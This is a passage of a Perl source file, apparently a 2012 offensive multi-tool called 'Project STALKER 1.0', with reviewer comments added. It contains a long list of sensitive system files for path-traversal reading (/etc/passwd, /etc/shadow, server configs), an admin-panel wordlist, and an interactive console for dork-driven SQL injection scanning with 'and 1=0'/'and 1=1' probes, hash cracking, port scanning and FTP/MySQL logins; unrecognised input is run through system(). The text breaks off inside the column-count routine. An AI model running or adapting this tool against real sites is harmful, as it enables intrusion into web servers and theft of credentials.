Doddy

Project STALKER 1.0 (Codigo NO identado)

Aug 14th, 2012
  1. #!usr/bin/perl
  2. #Project STALKER 1.0
  3. #(C) Doddy Hackman 2012
  4. #
  5. #ppm install http://www.bribes.org/perl/ppm/DBI.ppd
  6. #ppm install http://theoryx5.uwinnipeg.ca/ppms/DBD-mysql.ppd
  7. #http://search.cpan.org/~animator/Color-Output-1.05/Output.pm
  8.  
  9. use IO::Socket;
  10. use HTML::LinkExtor;
  11. use LWP::UserAgent;
  12. use Win32; ## Comment this line for Linux
  13. use Win32::OLE qw(in); ## Comment this line for Linux
  14. use Win32::Process; ## Comment this line for Linux
  15. use Net::FTP;
  16. use Cwd;
  17. use URI::Split qw(uri_split);
  18. use MIME::Base64;
  19. use DBI; ## Comment this line for Linux
  20. use URI::Escape;
  21.  
  22. use Color::Output;
  23. Color::Output::Init
  24.  
  25.  
  26. my @files =('C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/admin.php','C:/xampp/htdocs/leer.txt','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_
log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf.default','C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf','C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf','C:\ProgramFiles\xampp\apache\conf\httpd.conf','/usr/local/php/httpd.conf.php','/usr/local/php4/httpd.conf.php','/usr/local/php5/httpd.conf.php','/usr/local/php/httpd.conf','/usr/local/php4/httpd.conf','/usr/local/php5/httpd.conf','/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf','/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php','/usr/local/etc/apache/vhosts.conf','/etc/php.ini','/bin/php.ini','/etc/httpd/php.ini','/usr/lib/php.ini','/usr/lib/php/php.ini
','/usr/local/etc/php.ini','/usr/local/lib/php.ini','/usr/local/php/lib/php.ini','/usr/local/php4/lib/php.ini','/usr/local/php5/lib/php.ini','/usr/local/apache/conf/php.ini','/etc/php4.4/fcgi/php.ini','/etc/php4/apache/php.ini','/etc/php4/apache2/php.ini','/etc/php5/apache/php.ini','/etc/php5/apache2/php.ini','/etc/php/php.ini','/etc/php/php4/php.ini','/etc/php/apache/php.ini','/etc/php/apache2/php.ini','/web/conf/php.ini','/usr/local/Zend/etc/php.ini','/opt/xampp/etc/php.ini','/var/local/www/conf/php.ini','/etc/php/cgi/php.ini','/etc/php4/cgi/php.ini','/etc/php5/cgi/php.ini','c:\php5\php.ini','c:\php4\php.ini','c:\php\php.ini','c:\PHP\php.ini','c:\WINDOWS\php.ini','c:\WINNT\php.ini','c:\apache\php\php.ini','c:\xampp\apache\bin\php.ini','c:\NetServer\bin\stable\apache\php.ini','c:\home2\bin\stable\apache\php.ini','c:\home\bin\stable\apache\php.ini','/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini','/usr/local/cpanel/logs','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/access_log','/usr/local/cpanel/logs/error_log','/usr/local/cpanel/logs/license_log','/usr/local/cpanel/logs/login_log','/var/cpanel/cpanel.config','/var/log/mysql/mysql-bin.log','/var/log/mysql.log','/var/log/mysqlderror.log','/var/log/mysql/mysql.log','/var/log/mysql/mysql-slow.log','/var/mysql.log','/var/lib/mysql/my.cnf','C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log','C:\ProgramFiles\MySQL\data\hostname.err','C:\ProgramFiles\MySQL\data\mysql.log','C:\ProgramFiles\MySQL\data\mysql.err','C:\ProgramFiles\MySQL\data\mysql-bin.log','C:\MySQL\data\hostname.err','C:\MySQL\data\mysql.log','C:\MySQL\data\mysql.err','C:\MySQL\data\mysql-bin.log','C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini','C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf','C:\ProgramFiles\MySQL\my.ini','C:\ProgramFiles\MySQL\my.cnf','C:\MySQL\my.ini','C:\MySQL
\my.cnf','/etc/logrotate.d/proftpd','/www/logs/proftpd.system.log','/var/log/proftpd','/etc/proftp.conf','/etc/protpd/proftpd.conf','/etc/vhcs2/proftpd/proftpd.conf','/etc/proftpd/modules.conf','/var/log/vsftpd.log','/etc/vsftpd.chroot_list','/etc/logrotate.d/vsftpd.log','/etc/vsftpd/vsftpd.conf','/etc/vsftpd.conf','/etc/chrootUsers','/var/log/xferlog','/var/adm/log/xferlog','/etc/wu-ftpd/ftpaccess','/etc/wu-ftpd/ftphosts','/etc/wu-ftpd/ftpusers','/usr/sbin/pure-config.pl','/usr/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.conf','/usr/local/etc/pure-ftpd.conf','/usr/local/etc/pureftpd.pdb','/usr/local/pureftpd/etc/pureftpd.pdb','/usr/local/pureftpd/sbin/pure-config.pl','/usr/local/pureftpd/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.pdb','/etc/pureftpd.pdb','/etc/pureftpd.passwd','/etc/pure-ftpd/pureftpd.pdb','/var/log/pure-ftpd/pure-ftpd.log','/logs/pure-ftpd.log','/var/log/pureftpd.log','/var/log/ftp-proxy/ftp-proxy.log','/var/log/ftp-proxy','/var/log/ftplog','/etc/logrotate.d/ftp','/etc/ftpchroot','/etc/ftphosts','/var/log/exim_mainlog','/var/log/exim/mainlog','/var/log/maillog','/var/log/exim_paniclog','/var/log/exim/paniclog','/var/log/exim/rejectlog','/var/log/exim_rejectlog');
  27.  
  28. @panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx'
  29. ,'admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx'
  30. ,'asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx'
  31. ,'asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx'
  32. ,'admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx'
  33. ,'login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx'
  34. ,'administracion/index.asp','administracion/index.aspx','administracion/login.asp'
  35. ,'administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx'
  36. ,'administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php'
  37. ,'admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php'
  38. ,'admin/administrador.php','admin/default.php','administracion/','administracion/index.php'
  39. ,'administracion/login.php','administracion/ingresar.php','administracion/admin.php'
  40. ,'administration/','administration/index.php','administration/login.php'
  41. ,'administrator/index.php','administrator/login.php','administrator/system.php','system/'
  42. ,'system/login.php','admin.php','login.php','administrador.php','administration.php'
  43. ,'administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php'
  44. ,'yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html'
  45. ,'admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html'
  46. ,'admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html'
  47. ,'administrator/','administrator/index.html','administrator/login.html'
  48. ,'administrator/account.html','administrator/account.php','administrator.html','login.html'
  49. ,'modelsearch/login.php','moderator.php','moderator.html','moderator/login.php'
  50. ,'moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/'
  51. ,'account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html'
  52. ,'admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp'
  53. ,'admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp'
  54. ,'admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp'
  55. ,'administrator/login.asp','administrator/account.asp','administrator.asp'
  56. ,'modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp'
  57. ,'account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/'
  58. ,'fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php'
  59. ,'sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp'
  60. ,'ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html'
  61. ,'Server.asp','Server/','wp-admin/','administr8.php','administr8.html'
  62. ,'administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp'
  63. ,'webadmin.html','administratie/','admins/','admins.php','admins.asp'
  64. ,'admins.html','administrivia/','Database_Administration/','WebAdmin/'
  65. ,'useradmin/','sysadmins/','admin1/','system-administration/','administrators/'
  66. ,'pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/'
  67. ,'administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/'
  68. ,'cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/
  69. ','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/
  70. ','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/
  71. ','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/
  72. ','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/'
  73. ,'project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/'
  74. ,'wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/'
  75. ,'Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/'
  76. ,'irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/'
  77. ,'administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/'
  78. ,'Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/'
  79. ,'cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/'
  80. ,'server/','database_administration/','power_user/','system_administration/'
  81. ,'ss_vms_admin_sm/');
  82.  
  83.  
  84. unless (-d "/logs/webs") {
       # Create the directories the tool writes its result logs into.
       # NOTE(review): the test above checks the absolute path "/logs/webs" while the
       # mkdir calls use the relative "logs/..." path, so they run whenever
       # "/logs/webs" is absent. The mode 777 is a decimal literal, not octal 0777,
       # and neither return value is checked.
  85. mkdir("logs/",777);
  86. mkdir("logs/webs/",777);
  87. }
  88.  
       # Shared HTTP client object with a 5-second timeout.
       # Requests issued through $nave carry this fixed Firefox 2.0.0.12 User-Agent
       # (note there is no space before "Firefox"); the exact string is therefore a
       # usable match pattern when reviewing web server or proxy logs.
  89. my $nave = LWP::UserAgent->new;
  90. $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
  91. $nave->timeout(5);
  92.  
       # head() is defined outside the visible part of the file.
  93. head();
  94.  
  95. getinfo(); ## Comment this line for Linux
  96.  
       # Routes Ctrl-C to a sub named "next"; that sub is not defined in the visible
       # part of the file.
  97. $SIG{INT} = \&next; ## Comment on this line to compile to exe
  98.  
       # Prompt loop: menujo() handles one command per iteration and the loop only
       # ends when a handler calls exit.
  99. while(1) {
  100.  
  101. menujo();
  102.  
  103. }
  104.  
  105. sub getinfo {
       # Prints the OS name, login name and domain name of the local Windows machine,
       # as reported by the Win32 module. Takes no arguments and returns nothing useful.
       # $so, $login and $domain are assigned without "my", so they are package globals.
  106.  
  107. $so = Win32::GetOSName();
  108. $login = Win32::LoginName();
  109. $domain = Win32::DomainName();
       # cprint is presumably provided by Color::Output; the "\x03NN" sequences select
       # the output colour - TODO confirm against that module.
  110. cprint "\x0313"; #13
  111. print "\n\n[OS] : $so [Login] : $login [Group] : $domain\n\n";
  112. cprint "\x030";
  113. }
  114.  
  115. sub menujo {
       # One iteration of the interactive console: prints the prompt, reads a line
       # from STDIN and dispatches it to the matching cmd_* handler below.
       # Most handlers test the input with an unanchored regex and strip only the
       # first space from the captured argument, so a command name is recognised
       # anywhere in the line.
       # Any line that matches no handler reaches the final else branch and is passed
       # unchanged to system(), i.e. it runs as a shell command on the local machine.
       # The helpers called from here (getip, whois, infocon, toma, get_links,
       # scanpaths, scanport, scanpanel, google, sql, crackit, ftp, enter, ...) are
       # defined outside the visible part of the file.
  116.  
  117. print "\n\n";
  118. cprint "\x035r00t\x030"; #13
  119. cprint "\x033 ~ # \x030"; #13
  120.  
  121. cprint "\x037";
  122.  
  123. chomp (my $cmd = <stdin>);
  124. print "\n\n";
  125.  
  126. ###############################################################################
  127.  
  128. if ($cmd eq "cmd_getinfo") {
  129. getinfo();
  130. }
  131. elsif($cmd =~/cmd_getip(.*)/) {
  132. my $te = $1;
  133. $te=~s/ //;
  134. if ($te eq "" or $te eq " ") {
  135. print "\n[+] sintax : cmd_getip <host>\n";
  136. } else {
  137. print "\n[IP] : ".getip($te)."\n";
  138. print "\n";
  139. }
  140. }
  141.  
  142. elsif($cmd=~/cmd_whois(.*)/) {
  143. my $te = $1;
  144. $te=~s/ //;
  145. if ($te eq "" or $te eq " ") {
  146. print "\n[+] sintax : cmd_whois <host>\n";
  147. } else {
  148. print "[+] Getting data\n\n";
  149. print whois($te);
  150. print "\n\n";
  151. }
  152. }
  153.  
  154. elsif($cmd=~/cmd_locate(.*)/) {
  155. my $te = $1;
  156. $te=~s/ //;
  157. if ($te eq "" or $te eq " ") {
  158. print "\n[+] sintax : cmd_locate <host>\n";
  159. } else {
  160. infocon($te);
  161. print "\n\n";
  162. }
  163. }
  164.  
  165. elsif ($cmd =~/cmd_getlinks(.*)/) {
  166. my $te = $1;
  167. $te=~s/ //;
  168. if ($te eq "" or $te eq " ") {
  169. print "\n[+] sintax : cmd_getlinks <page>\n";
  170. } else {
  171. print "[+] Extracting links in the page\n\n\n";
  172. $code = toma($te);
  173. my @re = get_links($code);
  174. for my $url(@re) {
  175. print "[Link] : $url\n";
  176. }
  177. print "\n\n[+] Finish\n";
  178. }
  179. }
  180.  
  181. elsif ($cmd eq "cmd_help") {
  182. helpme();
  183. }
  184.  
  185. elsif ($cmd eq "cmd_getprocess") {
  186. my %re = getprocess();
  187.  
  188.  
  189. for my $data(keys %re) {
       # NOTE(review): $t is not assigned anywhere in this sub, and $proceso / $pid
       # are not used afterwards; the output below comes from %re alone.
  190. ($proceso,$pid) = ($t=~/(.*):(.*)/ig);
  191. print "[+] Proceso : ".$data."\n";
  192. print "[+] PID : ".$re{$data}."\n\n";
  193. }
  194. }
  195. elsif ($cmd=~/cmd_killprocess(.*)/) {
  196. my $te = $1;
  197. $te=~s/ //;
  198. if ($te eq "" or $te eq " ") {
  199. print "\n[+] sintax : cmd_killprocess <pid>\n";
  200. } else {
  201. if (killprocess($te)) {
  202. print "[+] Process closed\n";
  203. }
  204. }
  205.  
  206. }
  207. elsif ($cmd=~/cmd_conec(.*)/) {
  208. my $te = $1;
  209. $te=~s/ //;
  210. if ($te eq "" or $te eq " ") {
  211. print "\n[+] sintax : cmd_conec <host> <port> <command>\n";
  212. } else {
  213. if($cmd=~/cmd_conec (.*) (.*) (.*)/) {
  214. my($a,$b,$c) = ($1,$2,$3);
  215. print conectar($a,$b,$c);
  216. }
  217. }
  218. }
  219.  
  220. elsif ($cmd=~/cmd_allow(.*)/) {
  221.  
  222. my $te = $1;
  223. $te=~s/ //;
  224. if ($te eq "" or $te eq " ") {
  225. print "\n[+] sintax : cmd_allow <host>\n";
  226. } else {
       # Sends a bare "GET / HTTP/1.0" to port 80 through conectar() and prints the
       # Allow: header if the reply contains one.
  227. $re = conectar($te,"80","GET / HTTP/1.0\r\n");
  228. if ($re=~/Allow:(.*)/ig) {
  229. print "[+] Allow : ".$1."\n";
  230. } else {
  231. print "\n[-] Not Found\n";
  232. }
  233. }
  234. }
  235.  
  236. elsif ($cmd=~/cmd_paths(.*)/) {
  237. my $te = $1;
  238. $te=~s/ //;
  239. if ($te eq "" or $te eq " ") {
  240. print "\n[+] sintax : cmd_paths <page>\n";
  241. } else {
  242. scanpaths($te);
  243. }
  244. }
  245.  
  246. elsif ($cmd=~/cmd_encodehex(.*)/) {
  247. my $te = $1;
  248. $te=~s/ //;
  249. if ($te eq "" or $te eq " ") {
  250. print "\n[+] sintax : cmd_encodehex <text>\n";
  251. } else {
  252. print "\n\n[+] ".hex_en($te)."\n\n";
  253. }
  254. }
  255.  
  256. elsif ($cmd=~/cmd_decodehex(.*)/) {
  257. my $te = $1;
  258. $te=~s/ //;
  259. if ($te eq "" or $te eq " ") {
  260. print "\n[+] sintax : cmd_decodehex <text>\n";
  261. } else {
  262. print "\n\n[+] ".hex_de($te)."\n\n";
  263. }
  264. }
  265.  
  266. elsif ($cmd=~/cmd_download(.*)/) {
  267.  
  268. my $te = $1;
  269. $te=~s/ //;
  270. if ($te eq "" or $te eq " ") {
  271. print "\n[+] sintax : cmd_download <url>\n";
  272. } else {
  273.  
  274. my $file = $te;
  275. my ($scheme,$auth,$path,$query,$frag ) = uri_split($te);
  276.  
       # The local file name is the text after the last "/" of the URL path.
  277. if ($path =~/(.*)\/(.*)$/) {
  278. my $file = $2;
  279.  
  280. print "[+] Downloading ...\n";
  281.  
  282. if (download($te,$file)) {
  283. print "[+] File downloaded\n";
  284. }}}
  285.  
  286. }
  287.  
  288. elsif ($cmd=~/cmd_encodeascii(.*)/) {
  289.  
  290. my $te = $1;
  291. $te=~s/ //;
  292. if ($te eq "" or $te eq " ") {
  293. print "\n[+] sintax : cmd_encodeascii <text>\n";
  294. } else {
  295. print "\n\n[+] ".ascii($te)."\n\n";
  296. }
  297.  
  298. }
  299.  
  300. elsif ($cmd=~/cmd_decodeascii(.*)/) {
  301.  
  302. my $te = $1;
  303. $te=~s/ //;
  304. if ($te eq "" or $te eq " ") {
  305. print "\n[+] sintax : cmd_decodeascii <text>\n";
  306. } else {
  307. print "\n\n[+] ".ascii_de($te)."\n\n";
  308. }
  309.  
  310. }
  311.  
  312. elsif ($cmd=~/cmd_encodebase(.*)/) {
  313.  
  314. my $te = $1;
  315. $te=~s/ //;
  316. if ($te eq "" or $te eq " ") {
  317. print "\n[+] sintax : cmd_encodebase <text>\n";
  318. } else {
  319. print "\n\n[+] ".base($te)."\n\n";
  320. }
  321.  
  322. }
  323.  
  324. elsif ($cmd=~/cmd_decodebase(.*)/) {
  325. my $te = $1;
  326. $te=~s/ //;
  327. if ($te eq "" or $te eq " ") {
  328. print "\n[+] sintax : cmd_decodebase <text>\n";
  329. } else {
  330. print "\n\n[+] ".base_de($te)."\n\n";
  331. }
  332. }
  333.  
  334. elsif ($cmd eq "cmd_aboutme") {
  335. aboutme();
  336. }
  337.  
  338. elsif ($cmd=~/cmd_scanport(.*)/) {
  339. my $te = $1;
  340. $te=~s/ //;
  341. if ($te eq "" or $te eq " ") {
  342. print "\n[+] sintax : cmd_scanport <host>\n";
  343. } else {
  344. scanport($te);
  345. }
  346. }
  347.  
  348. elsif ($cmd=~/cmd_panel(.*)/) {
  349. my $te = $1;
  350. $te=~s/ //;
  351. if ($te eq "" or $te eq " ") {
  352. print "\n[+] sintax : cmd_panel <web>\n";
  353. } else {
  354. scanpanel($te);
  355. }
  356.  
  357. }
  358.  
  359. elsif ($cmd=~/cmd_scangoogle/) {
       # Reads a search query and a page count, collects result links through
       # google(), and passes every link that contains "=" (cut after its last "=")
       # to sql(). Neither helper is visible here.
       # Seen from a web server, this shows up as unsolicited requests against
       # parameterised URLs that are indexed by a search engine.
  360. print "[Dork] : ";
  361. chomp(my $dork = <stdin>);
  362. print "\n\n[Pages] : ";
  363. chomp(my $pages = <stdin>);
  364. print "\n\n[Starting the search]\n\n";
  365. my @links = google($dork,$pages);
  366. print "\n[Links Found] : ".int(@links)."\n\n\n";
  367. print "[Starting the scan]\n\n\n";
  368. for my $link(@links) {
  369. if ($link=~/(.*)=/ig) {
  370. my $web = $1;
  371. sql($web."=");
  372. }}
  373. print "\n\n[+] Finish\n";
  374. }
  375.  
  376. elsif ($cmd=~/cmd_getpass(.*)/) {
  377. my $te = $1;
  378. $te=~s/ //;
  379. if ($te eq "" or $te eq " ") {
  380. print "\n[+] sintax : cmd_getpass <hash>\n";
  381. } else {
  382. my $ha = $te;
       # ver_length() and crackit() are not visible here; a result that does not
       # contain "false01" is printed and appended to logs/hashes-found.txt as
       # "<hash>:<plaintext>".
  383. if (ver_length($ha)) {
  384. print "[+] Cracking Hash...\n";
  385. my $re = crackit($ha);
  386. unless($re=~/false01/) {
  387. print "\n\n[+] Cracked : $re\n\n";
  388. saveyes("logs/hashes-found.txt",$ha.":".$re);
  389. } else {
  390. print "\n[-] Not Found\n\n";
  391. }
  392. } else {
  393. print "\n\n[-] Hash invalid\n\n";
  394. }
  395. }
  396.  
  397. }
  398.  
  399. elsif ($cmd=~/cmd_ftp(.*)/) {
  400. my $te = $1;
  401. $te=~s/ //;
  402. if ($te eq "" or $te eq " ") {
  403. print "\n[+] sintax : cmd_ftp <host> <user> <pass>\n";
  404. } else {
  405. if($cmd=~/cmd_ftp (.*) (.*) (.*)/) {
  406. ftp($1,$2,$3);
  407. }
  408. }
  409. }
  410.  
  411. elsif ($cmd eq "cmd_navegator") {
       # Local file browser: list / cd / del / rename / open act on the working
       # directory of the machine running the script. The prompt repeats through
       # the "goto nave" at the end of this branch.
  412. nave:
  413. print getcwd().">";
  414. chomp(my $rta = <stdin>);
  415. print "\n\n";
  416. if ($rta=~/list/) {
  417. my @files = coleccionar(getcwd());
  418. for(@files) {
  419. if (-f $_) {
  420. print "[File] : ".$_."\n";
  421. } else {
  422. print "[Directory] : ".$_."\n";
  423. }}}
  424. if ($rta=~/cd (.*)/) {
  425. my $dir = $1;
  426. if (chdir($dir)) {
  427. print "\n[+] Directory changed\n";
  428. } else {
  429. print "\n[-] Error\n";
  430. }}
  431. if ($rta=~/del (.*)/) {
  432. my $file = getcwd()."/".$1;
  433. if (-f $file) {
  434. if (unlink($file)) {
  435. print "\n[+] File Deleted\n";
  436. } else {
  437. print "\n[-] Error\n";
  438. }
  439. } else {
  440. if (rmdir($file)) {
  441. print "\n[+] Directory Deleted\n";
  442. } else {
  443. print "\n[-] Error\n";
  444. }}}
  445. if ($rta=~/rename (.*) (.*)/) {
  446. if (rename(getcwd()."/".$1,getcwd()."/".$2)) {
  447. print "\n[+] File Changed\n";
  448. } else {
  449. print "\n[-] Error\n";
  450. }}
  451. if ($rta=~/open (.*)/) {
  452. my $file = $1;
  453. chomp $file;
       # The typed text is handed to the shell as a command line.
  454. system($file);
  455. #system(getcwd()."/".$file);
  456. }
  457.  
  458. if ($rta eq "help") {
  459. print "\nCommands :
  460.  
  461. help
  462. cd <dir>
  463. list
  464. del <del>
  465. rename <file1> <file2>
  466. open <file>
  467. exit
  468. \n\n";
  469. }
  470.  
  471. if ($rta eq "exit") {
       # There is no loop inside this sub, so "next" applies to the caller's
       # while(1) loop: it leaves menujo() and a fresh prompt is shown.
  472. next;
  473. }
  474.  
  475. print "\n\n";
  476. goto nave;
  477. }
  478. elsif ($cmd=~/cmd_kobra(.*)/) {
  479. my $te = $1;
  480. $te=~s/ //;
  481. if ($te eq "" or $te eq " ") {
  482. print "\n[+] sintax : cmd_kobra <page>\n";
  483. } else {
  484. my $url = $te;
  485. chomp $url;
  486. scansqli($url,"--");
  487. }
  488. }
  489.  
  490. elsif ($cmd=~/cmd_mysql(.*)/) {
  491.  
  492. my $te = $1;
  493. $te=~s/ //;
  494. if ($te eq "" or $te eq " ") {
  495. print "\n[+] sintax : cmd_mysql <host> <user> <pass>\n";
  496. } else {
  497. if($cmd=~/cmd_mysql (.*) (.*) (.*)/) {
  498. enter($1,$2,$3);
  499. }
  500. }
  501.  
  502. }
  503.  
  504. elsif ($cmd eq "cmd_exit") {
  505. copyright();
  506. <stdin>;
  507. exit(1);
  508. }
  509.  
  510. else {
       # Fallback: unrecognised input is executed as a local shell command.
  511. system($cmd);
  512. }
  513. cprint "\x030";
  514. #####################################################################################
  515. }
  516.  
  517.  
  518. sub scansqli {
       # Entry point of the SQL injection check for one URL.
       #   $_[0]  target URL, $_[1]  comment/bypass token (the caller in menujo passes "--").
       # bypass(), partimealmedio(), savefile() and toma() are defined outside the
       # visible part of the file; toma() is presumably an HTTP GET returning the
       # response body - TODO confirm.
       # A URL that already contains "hackman" (case-insensitive) is treated as a
       # prepared injection URL and goes straight to the menu. Otherwise two requests
       # are made, one with an "and 1=0" and one with an "and 1=1" condition appended,
       # and the two response bodies are compared as strings.
       # Defensive reading: the bodies can only differ when the parameter value is
       # concatenated into an SQL statement; bound (parameterised) queries remove
       # the difference, and paired "1=0" / "1=1" requests are a recognisable
       # pattern in access logs.
  519.  
  520. my $page = $_[0];
  521. print "[Status] : Scanning.....\n";
  522. ($pass1,$bypass2) = &bypass($_[1]);
  523. my $save = partimealmedio($_[0]);
  524. if ($_[0]=~/hackman/ig) {
  525. savefile($save.".txt","\n[Target Confirmed] : $_[0]\n");
  526. &menu_options($_[0],$pass,$save);
  527. } else {
  528.  
  529. my $testar1 = toma($page.$pass1."and".$pass1."1=0".$pass2);
  530. my $testar2 = toma($page.$pass1."and".$pass1."1=1".$pass2);
  531.  
  532. unless ($testar1 eq $testar2) {
  533. motor($page,$_[1]);
  534. } else {
  535. print "\n[-] Not vulnerable\n\n";
  536. print "[+] Scan anyway y/n : ";
  537. chomp(my $op = <stdin>);
  538. if ($op eq "y") {
  539. motor($page,$_[1]);
  540. } else {
  541. #head();
  542. #menu();
  543. }}}}
  544.  
  545. sub motor {
       # Runs the column-count search for a URL and opens the interactive menu when
       # it succeeds.
       #   $_[0]  target URL, $_[1]  bypass token.
       # "&length(...)" calls the sub named length defined in this file; it returns
       # (injection URL, log file base name, control flag).
       # $pass is not assigned in the visible part of the file.
  546.  
  547. my ($gen,$save,$control) = &length($_[0],$_[1]);
  548.  
       # $control is 1 only when length() found its marker in a response.
  549. if ($control eq 1) {
  550. print "[Status] : Enjoy the menu\n\n";
  551. &menu_options($gen,$pass,$save);
  552. } else {
  553. print "[Status] : Length columns not found\n\n";
  554. }
  555. }
  556.  
  557. sub length {
       # Searches for the number of columns of the query behind a URL parameter.
       #   $_[0]  target URL, $_[1]  bypass token.
       # Returns (URL with the literal "hackman" in place of a reflected column,
       # log file base name, 1) on success; when no request reflects the marker the
       # loop ends and nothing is returned explicitly.
       # The sub shares its name with Perl's builtin length; motor() calls it as &length(...).
